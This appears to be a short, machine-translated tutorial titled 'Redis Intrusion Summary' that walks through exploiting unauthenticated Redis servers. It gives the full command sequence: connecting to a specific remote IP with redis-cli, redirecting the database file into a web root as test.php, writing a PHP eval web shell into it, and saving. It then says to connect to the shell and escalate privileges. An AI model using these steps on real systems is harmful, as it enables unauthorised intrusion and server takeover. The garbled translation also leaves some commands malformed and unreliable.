Redis Intrusion Summary

Redis Installation:

Windows installation package: Http://pan.baidu.com/s/1i3jLlC5

After downloading, start the installation:

Redis-server.exe redis.conf:

A simple step, the installation succeeds, keep this Windows running continuously ~

Look at our local port, you can see a 6379 more ports, security risks come, remember to set up the Redis password ~

Next, start using Redis-cli.exe for the remote Redis intrusion:

If there is an unauthorized access vulnerability to the remote Redis database, you can upload the shell directly:

To open the Redis client:

Redis-cli-h 125.39.185.150-p 6379

Next, set the memory data:

Config set dir/var/www/html (set the switched web directory in memory/var/www/html)

Config Set Dbfilename test.php (Create a test.php file in the in-memory/var/www/html directory)

Set Xiaoma "<?php @eval ($_post[mi]);? > (set Key-value, at which time the value is in memory)

Save (saves the key-value in memory to the hard disk and saves it as a test.php file)

Four OK is done ~

At this point, you can directly connect to the shell, began to mention the right ~

Redis Intrusion Reference:

http://www.wooyun.org/bugs/wooyun-2015-0101465

http://www.wooyun.org/bugs/wooyun-2010-0105096

Redis Intrusion Summary